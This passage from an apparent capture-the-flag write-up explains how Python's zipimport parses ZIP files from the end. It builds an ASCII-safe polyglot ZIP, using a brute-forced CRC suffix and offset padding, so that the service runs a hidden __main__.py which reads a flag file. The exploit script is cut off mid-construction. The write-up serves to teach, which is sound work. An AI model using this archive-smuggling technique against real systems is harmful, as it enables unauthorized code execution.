<p>It enters a loop, reading each Central Directory File Header (CDFH). Each CDFH must start with the signature <code>b'PK\x01\x02'</code> (<code>Lib/zipimport.py:395</code>).</p>
<p>For each entry, it unpacks metadata such as compression method, data sizes, file offset, and file name length (<code>Lib/zipimport.py:399-Lib/zipimport.py:412</code>). This metadata, including the file name (decoded from bytes, first attempting UTF-8, then CP437/latin1) (<code>Lib/zipimport.py:423-Lib/zipimport.py:429</code>), is stored in an internal dictionary (<code>self._files</code>).</p>
<p><strong>Locating and Loading Modules:</strong></p>
<p>When the import system requests a module (e.g., via <code>find_spec</code> (<code>Lib/zipimport.py:155</code>)), <code>zipimporter</code> uses its <code>cached_files</code> dictionary to determine if the module exists within the archive.</p>
<p>The <code>_get_data(archive, toc_entry)</code> function (<code>Lib/zipimport.py:461</code>) is responsible for retrieving the actual file content. It seeks to the <code>file_offset</code> (which points to the Local File Header, typically starting with <code>PK\x03\x04</code>), reads and skips the local header, and then reads the compressed data.</p>
<p>If the data is compressed (e.g., <code>DEFLATE</code>, method 8), <code>zlib.decompress</code> is used (<code>Lib/zipimport.py:479</code>).</p>
<p>Finally, <code>_get_module_code</code> takes this raw data. If it’s a <code>.pyc</code> file, it validates the bytecode magic number and timestamp, then uses <code>marshal.loads</code> to deserialize the code object. If it’s a <code>.py</code> file, it compiles the source code using Python’s built-in <code>compile</code> function (<code>Lib/zipimport.py:515</code>, <code>Lib/zipimport.py:521</code>). The resulting code object is then executed to load the module.</p>
</blockquote>
<h3>A Brief Overview of the ZIP File Format</h3>
<p>Python's "backwards" parsing works because a ZIP file is defined by the EOCD record at its end. The EOCD record points to the start of the Central Directory (CD), which holds metadata about the files in the archive, including their names, sizes, and offsets. Each CD entry starts with a Central Directory File Header (CDFH) that points to the file's Local File Header (LFH), and each LFH is followed by the actual (possibly compressed) file data.</p>
<p>Note that both the EOCD and CD headers point "backwards" to an offset earlier in the file. Therefore, it doesn't actually matter what appears <strong><em>before</em></strong> the LFHs, as long as the relative offsets point to the correct locations.</p>
<figure class="mx-auto"><img alt="ZIP File Format" loading="lazy" width="2560" height="1388" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fzip_layout.1c9f4c35.png&amp;w=3840&amp;q=75 1x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fzip_layout.1c9f4c35.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
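<p>The pointer chain in the diagram can be followed by hand with <code>struct</code>. The sketch below builds a one-file archive with the standard <code>zipfile</code> module and then walks EOCD, CDFH and LFH in that order. The variable names are mine and the parsing is deliberately minimal (one entry, no ZIP64).</p>

```python
import io
import struct
import zipfile

BODY = b"print('hi')\n"

# Build a one-file, uncompressed archive in memory with the stdlib writer.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
    zf.writestr("__main__.py", BODY)
data = buf.getvalue()

# 1. EOCD: found by searching backwards from the end of the file.
eocd_pos = data.rfind(b"PK\x05\x06")
(_sig, _disk, _cd_disk, _n_disk, n_entries,
 cd_size, cd_offset, _comment_len) = struct.unpack_from("<4sHHHHIIH", data, eocd_pos)

# 2. CDFH: 46 fixed bytes; the last field is the offset of the LFH.
cdfh = struct.unpack_from("<4s6H3I5H2I", data, cd_offset)
assert cdfh[0] == b"PK\x01\x02"
method, stored_size, name_len, lfh_offset = cdfh[4], cdfh[8], cdfh[10], cdfh[16]
name = data[cd_offset + 46 : cd_offset + 46 + name_len]

# 3. LFH: 30 fixed bytes, then the name and extra field, then the file data.
lfh = struct.unpack_from("<4s5H3I2H", data, lfh_offset)
assert lfh[0] == b"PK\x03\x04"
data_start = lfh_offset + 30 + lfh[9] + lfh[10]
body = data[data_start : data_start + stored_size]

print(n_entries, name, method, body)
```

<p>Every pointer that gets followed refers to an earlier position in the file, which is what leaves the bytes in front of the first LFH free.</p>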
<h3>Our Plan</h3>
<p>What we want to do is to construct a valid ZIP file as follows (the parts we control are in red, and the parts we don't are in grey):</p>
<figure class="mx-auto"><img alt="File Structure" loading="lazy" width="960" height="540" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fstructure.ed0cba21.png&amp;w=1080&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fstructure.ed0cba21.png&amp;w=1920&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fstructure.ed0cba21.png&amp;w=1920&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>When <code>zipimporter</code> parses the file, it will:</p>
<ol>
<li>Seek to 22 bytes from the end of the file to check for the magic number <code>b'PK\x05\x06'</code> (the EOCD record).</li>
<li>It doesn't find the magic number there, because the trailing junk <code>\r\nprint("Thanks for playing!")</code> sits at the end of the file. It therefore falls back to reading from
<code>file_size - MAX_COMMENT_LEN - END_CENTRAL_DIR_SIZE</code>, the earliest position where the record could start given the maximum possible EOCD comment length, and searches from there to the end of the file.</li>
</ol>
<p><a href="https://github.com/python/cpython/blob/3.11/Lib/zipimport.py#L421-L438"><code>Lib/zipimport.py:421-438</code></a></p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">if</span><span style="color:#ADBAC7"> buffer[:</span><span style="color:#6CB6FF">4</span><span style="color:#ADBAC7">] </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> STRING_END_ARCHIVE</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#768390">  # Bad: End of Central Dir signature</span></span>
<span data-line=""><span style="color:#768390">  # Check if there's a comment.</span></span>
<span data-line=""><span style="color:#F47067">  try</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#ADBAC7">      fp.seek(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">2</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">      file_size </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> fp.tell()</span></span>
<span data-line=""><span style="color:#F47067">  except</span><span style="color:#6CB6FF"> OSError</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#F47067">      raise</span><span style="color:#ADBAC7"> ZipImportError(</span><span style="color:#F47067">f</span><span style="color:#96D0FF">"can't read Zip file: </span><span style="color:#F47067">{</span><span style="color:#ADBAC7">archive</span><span style="color:#F47067">!r}</span><span style="color:#96D0FF">"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#F69D50">                            path</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">archive)</span></span>
<span data-line=""><span style="color:#ADBAC7">  max_comment_start </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> max</span><span style="color:#ADBAC7">(file_size </span><span style="color:#F47067">-</span><span style="color:#6CB6FF"> MAX_COMMENT_LEN</span><span style="color:#F47067"> -</span></span>
<span data-line=""><span style="color:#6CB6FF">                          END_CENTRAL_DIR_SIZE</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#F47067">  try</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#ADBAC7">      fp.seek(max_comment_start)</span></span>
<span data-line=""><span style="color:#ADBAC7">      data </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> fp.read()</span></span>
<span data-line=""><span style="color:#F47067">  except</span><span style="color:#6CB6FF"> OSError</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#F47067">      raise</span><span style="color:#ADBAC7"> ZipImportError(</span><span style="color:#F47067">f</span><span style="color:#96D0FF">"can't read Zip file: </span><span style="color:#F47067">{</span><span style="color:#ADBAC7">archive</span><span style="color:#F47067">!r}</span><span style="color:#96D0FF">"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#F69D50">                            path</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">archive)</span></span>
<span data-line=""><span style="color:#ADBAC7">  pos </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> data.rfind(</span><span style="color:#6CB6FF">STRING_END_ARCHIVE</span><span style="color:#ADBAC7">)</span></span></code></pre></figure>
<ol start="3">
<li>It finds our EOCD record, which appears in front of the trailing junk. Our EOCD record will point to the start of our CDFH, which we also control.</li>
<li>The CDFH will point to the LFH, which we also control.</li>
<li>The LFH will point to the actual file data of <code>__main__.py</code>, which we also control.</li>
</ol>
<h3>Making our Payload ASCII-Safe</h3>
<p>There is an additional complication here. Because <code>input()</code> reads a text stream instead of raw bytes, any byte <code>\x80</code> or above that does not form a valid UTF-8 sequence will be converted into a code point in the surrogate range <code>U+D800</code> to <code>U+DFFF</code>. This will cause the file write to fail, because <code>f.write()</code> will attempt to encode the string as UTF-8, which fails if the string contains any lone surrogates.</p>
<p>To avoid this, we need to ensure that our payload is ASCII-safe, i.e. it only contains characters in the range <code>\x00-\x7f</code>.</p>
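<p>The failure mode is easy to reproduce in isolation. This sketch assumes the text stream decodes with the <code>surrogateescape</code> error handler, which matches the behaviour described above. The sample bytes are arbitrary.</p>

```python
raw = b"PK\x05\x06\x80\xff"   # arbitrary input containing two high bytes

# Assumption: stdin decodes with errors="surrogateescape", which turns
# undecodable bytes into lone surrogates instead of raising immediately.
text = raw.decode("utf-8", errors="surrogateescape")
print([hex(ord(c)) for c in text[-2:]])   # ['0xdc80', '0xdcff']

# Writing the string back out with a strict UTF-8 encoder then fails.
try:
    text.encode("utf-8")
    write_failed = False
except UnicodeEncodeError:
    write_failed = True
print(write_failed)                        # True

# A payload restricted to \x00-\x7f round-trips unchanged.
safe = b"PK\x05\x06\x00\x7f"
assert safe.decode("utf-8", errors="surrogateescape").encode("utf-8") == safe
```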
<p>This is clearly not feasible if the file content is compressed, but thankfully the ZIP format allows us to store files without compression by setting the compression method to <code>0</code> (i.e. <code>ZIP_STORED</code>). This is specified by the compression method field in the CDFH.</p>
<p>An additional place where this problem occurs is in the CRC-32 checksum computed over the uncompressed file data. To get around this, we can just brute-force a suffix to place at the end of our <code>__main__.py</code> file that will make the CRC-32 checksum ASCII-safe, as shown in the diagram above.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> ascii_safe</span><span style="color:#ADBAC7">(x: </span><span style="color:#6CB6FF">int</span><span style="color:#ADBAC7">) -&gt; </span><span style="color:#6CB6FF">bool</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#96D0FF">    """True if all four bytes have high bit clear."""</span></span>
<span data-line=""><span style="color:#F47067">    return</span><span style="color:#6CB6FF"> all</span><span style="color:#ADBAC7">(((x </span><span style="color:#F47067">&gt;&gt;</span><span style="color:#ADBAC7"> (</span><span style="color:#6CB6FF">8</span><span style="color:#F47067"> *</span><span style="color:#ADBAC7"> i)) </span><span style="color:#F47067">&amp;</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">80</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">==</span><span style="color:#6CB6FF"> 0</span><span style="color:#F47067"> for</span><span style="color:#ADBAC7"> i </span><span style="color:#F47067">in</span><span style="color:#6CB6FF"> range</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">4</span><span style="color:#ADBAC7">))</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> find_suffix</span><span style="color:#ADBAC7">(core: </span><span style="color:#6CB6FF">bytes</span><span style="color:#ADBAC7">, length: </span><span style="color:#6CB6FF">int</span><span style="color:#F47067"> =</span><span style="color:#6CB6FF"> 4</span><span style="color:#ADBAC7">) -&gt; </span><span style="color:#6CB6FF">tuple</span><span style="color:#ADBAC7">[</span><span style="color:#6CB6FF">bytes</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">int</span><span style="color:#ADBAC7">]:</span></span>
<span data-line=""><span style="color:#96D0FF">    """Brute-force an ASCII suffix of given length making the CRC-32 ASCII-safe; return (suffix, crc)."""</span></span>
<span data-line=""><span style="color:#ADBAC7">    printable </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> range</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">0x</span><span style="color:#6CB6FF">20</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">0x</span><span style="color:#6CB6FF">7F</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># space … tilde</span></span>
<span data-line=""><span style="color:#F47067">    for</span><span style="color:#ADBAC7"> tail </span><span style="color:#F47067">in</span><span style="color:#ADBAC7"> itertools.product(printable, </span><span style="color:#F69D50">repeat</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">length):</span></span>
<span data-line=""><span style="color:#ADBAC7">        payload </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> core </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> bytes</span><span style="color:#ADBAC7">(tail)</span></span>
<span data-line=""><span style="color:#ADBAC7">        crc     </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> zlib.crc32(payload) </span><span style="color:#F47067">&amp;</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">FFFFFFFF</span></span>
<span data-line=""><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> ascii_safe(crc):</span></span>
<span data-line=""><span style="color:#F47067">            return</span><span style="color:#6CB6FF"> bytes</span><span style="color:#ADBAC7">(tail), crc</span></span>
<span data-line=""><span style="color:#F47067">    raise</span><span style="color:#6CB6FF"> RuntimeError</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"unexpected: no suffix found"</span><span style="color:#ADBAC7">)</span></span></code></pre></figure>
<p>The last place where this problem occurs is in the CD offset. If our payload is too long, the offset will exceed 127 (<code>0x7f</code>), and any offset byte of <code>\x80</code> or above is non-ASCII.
To get around this, we just add padding after the file contents and before the CDFH, so that the offset contains only ASCII-safe bytes, e.g. <code>\x01\x00</code>.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#768390"># patch CD offset to make it ASCII safe</span></span>
<span data-line=""><span style="color:#ADBAC7">cd_offset </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> delta </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(lfh) </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">PAYLOAD</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">pad </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> 0</span></span>
<span data-line=""><span style="color:#F47067">while</span><span style="color:#F47067"> not</span><span style="color:#ADBAC7"> ascii_safe(cd_offset </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> pad):</span></span>
<span data-line=""><span style="color:#ADBAC7">    pad </span><span style="color:#F47067">+=</span><span style="color:#6CB6FF"> 1</span></span>
<span data-line=""><span style="color:#ADBAC7">padding </span><span style="color:#F47067">=</span><span style="color:#F47067"> b</span><span style="color:#96D0FF">'</span><span style="color:#F47067">\x00</span><span style="color:#96D0FF">'</span><span style="color:#F47067"> *</span><span style="color:#ADBAC7"> pad</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">cd_offset </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> pad</span></span></code></pre></figure>
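<p>As a quick worked example of the padding loop, take a hypothetical CD offset of <code>0x85</code>. The <code>padding_for</code> wrapper is a name I made up for illustration, and <code>ascii_safe</code> is repeated from above so the snippet runs on its own.</p>

```python
import struct

def ascii_safe(x: int) -> bool:
    """True if all four little-endian bytes of x have the high bit clear."""
    return all(((x >> (8 * i)) & 0x80) == 0 for i in range(4))

def padding_for(cd_offset: int) -> int:
    """Smallest number of pad bytes that makes the offset ASCII-safe."""
    pad = 0
    while not ascii_safe(cd_offset + pad):
        pad += 1
    return pad

# 0x85 has its high bit set, so we pad up to 0x100, which packs as 00 01 00 00.
pad = padding_for(0x85)
print(pad, struct.pack("<I", 0x85 + pad).hex())   # 123 00010000

# Offsets up to 0x7f need no padding at all.
print(padding_for(0x7F))                          # 0
```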
<h2>Putting it All Together</h2>
<p>Our final payload looks like this:</p>
<figure class="mx-auto"><img alt="Payload" loading="lazy" width="949" height="56" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffinal.6ce789be.png&amp;w=1080&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffinal.6ce789be.png&amp;w=1920&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffinal.6ce789be.png&amp;w=1920&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>which we construct and send to the service with the following code:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> io, struct, zipfile, pathlib</span></span>
<span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> itertools</span></span>
<span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> zlib</span></span>
<span data-line=""><span style="color:#F47067">from</span><span style="color:#ADBAC7"> pwn </span><span style="color:#F47067">import</span><span style="color:#ADBAC7"> remote</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">JUNK_HEAD</span><span style="color:#F47067"> =</span><span style="color:#96D0FF"> """print("hello world!")</span></span>
<span data-line=""><span style="color:#96D0FF"># This is a comment. Here's another:</span></span>
<span data-line=""><span style="color:#96D0FF"># """</span><span style="color:#ADBAC7">.encode()</span></span>
<span data-line=""><span style="color:#6CB6FF">JUNK_TAIL</span><span style="color:#F47067"> =</span><span style="color:#96D0FF"> """</span></span>
<span data-line=""><span style="color:#96D0FF">print("Thanks for playing!")"""</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">FILENAME</span><span style="color:#F47067"> =</span><span style="color:#F47067"> b</span><span style="color:#96D0FF">"__main__.py"</span></span>
<span data-line=""><span style="color:#6CB6FF">BODY</span><span style="color:#F47067">     =</span><span style="color:#F47067"> b</span><span style="color:#96D0FF">"print(open('/home/ctfuser/flag').read())#"</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> ascii_safe</span><span style="color:#ADBAC7">(x: </span><span style="color:#6CB6FF">int</span><span style="color:#ADBAC7">) -&gt; </span><span style="color:#6CB6FF">bool</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#96D0FF">    """True if all four bytes have high bit clear."""</span></span>
<span data-line=""><span style="color:#F47067">    return</span><span style="color:#6CB6FF"> all</span><span style="color:#ADBAC7">(((x </span><span style="color:#F47067">&gt;&gt;</span><span style="color:#ADBAC7"> (</span><span style="color:#6CB6FF">8</span><span style="color:#F47067"> *</span><span style="color:#ADBAC7"> i)) </span><span style="color:#F47067">&amp;</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">80</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">==</span><span style="color:#6CB6FF"> 0</span><span style="color:#F47067"> for</span><span style="color:#ADBAC7"> i </span><span style="color:#F47067">in</span><span style="color:#6CB6FF"> range</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">4</span><span style="color:#ADBAC7">))</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> find_suffix</span><span style="color:#ADBAC7">(core: </span><span style="color:#6CB6FF">bytes</span><span style="color:#ADBAC7">, length: </span><span style="color:#6CB6FF">int</span><span style="color:#F47067"> =</span><span style="color:#6CB6FF"> 4</span><span style="color:#ADBAC7">) -&gt; </span><span style="color:#6CB6FF">tuple</span><span style="color:#ADBAC7">[</span><span style="color:#6CB6FF">bytes</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">int</span><span style="color:#ADBAC7">]:</span></span>
<span data-line=""><span style="color:#96D0FF">    """Brute-force an ASCII suffix of given length making the CRC-32 ASCII-safe; return (suffix, crc)."""</span></span>
<span data-line=""><span style="color:#ADBAC7">    printable </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> range</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">0x</span><span style="color:#6CB6FF">20</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">0x</span><span style="color:#6CB6FF">7F</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># space … tilde</span></span>
<span data-line=""><span style="color:#F47067">    for</span><span style="color:#ADBAC7"> tail </span><span style="color:#F47067">in</span><span style="color:#ADBAC7"> itertools.product(printable, </span><span style="color:#F69D50">repeat</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">length):</span></span>
<span data-line=""><span style="color:#ADBAC7">        payload </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> core </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> bytes</span><span style="color:#ADBAC7">(tail)</span></span>
<span data-line=""><span style="color:#ADBAC7">        crc     </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> zlib.crc32(payload) </span><span style="color:#F47067">&amp;</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">FFFFFFFF</span></span>
<span data-line=""><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> ascii_safe(crc):</span></span>
<span data-line=""><span style="color:#F47067">            return</span><span style="color:#6CB6FF"> bytes</span><span style="color:#ADBAC7">(tail), crc</span></span>
<span data-line=""><span style="color:#F47067">    raise</span><span style="color:#6CB6FF"> RuntimeError</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"unexpected: no suffix found"</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">SUFFIX</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">CRC</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> find_suffix(</span><span style="color:#6CB6FF">BODY</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#6CB6FF">PAYLOAD</span><span style="color:#F47067">     =</span><span style="color:#6CB6FF"> BODY</span><span style="color:#F47067"> +</span><span style="color:#6CB6FF"> SUFFIX</span></span>
<span data-line=""><span style="color:#6CB6FF">SIZE</span><span style="color:#F47067">        =</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">PAYLOAD</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> le32</span><span style="color:#ADBAC7">(x): </span><span style="color:#F47067">return</span><span style="color:#ADBAC7"> struct.pack(</span><span style="color:#96D0FF">"&lt;I"</span><span style="color:#ADBAC7">, x)</span></span>
<span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> le16</span><span style="color:#ADBAC7">(x): </span><span style="color:#F47067">return</span><span style="color:#ADBAC7"> struct.pack(</span><span style="color:#96D0FF">"&lt;H"</span><span style="color:#ADBAC7">, x)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">SIG_LFH</span><span style="color:#F47067">  =</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">04034B50</span></span>
<span data-line=""><span style="color:#6CB6FF">SIG_CDH</span><span style="color:#F47067">  =</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">02014B50</span></span>
<span data-line=""><span style="color:#6CB6FF">SIG_EOCD</span><span style="color:#F47067"> =</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">06054B50</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># --------------------------------------------------------------------</span></span>
<span data-line=""><span style="color:#768390"># build the ZIP file</span></span>
<span data-line=""><span style="color:#768390"># --------------------------------------------------------------------</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">delta </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">JUNK_HEAD</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># Local file header</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh  </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIG_LFH</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># version needed to extract</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># general purpose bit flag</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># compression method = stored</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># last mod file time</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># last mod file date</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">CRC</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIZE</span><span style="color:#ADBAC7">)       </span><span style="color:#768390"># compressed size</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIZE</span><span style="color:#ADBAC7">)       </span><span style="color:#768390"># uncompressed size</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">FILENAME</span><span style="color:#ADBAC7">))</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># extra field length</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#6CB6FF"> FILENAME</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># Central directory header</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh  </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIG_CDH</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># version made by</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># version needed</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># flags</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># method</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># time</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># date</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">CRC</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIZE</span><span style="color:#ADBAC7">)</span></span>
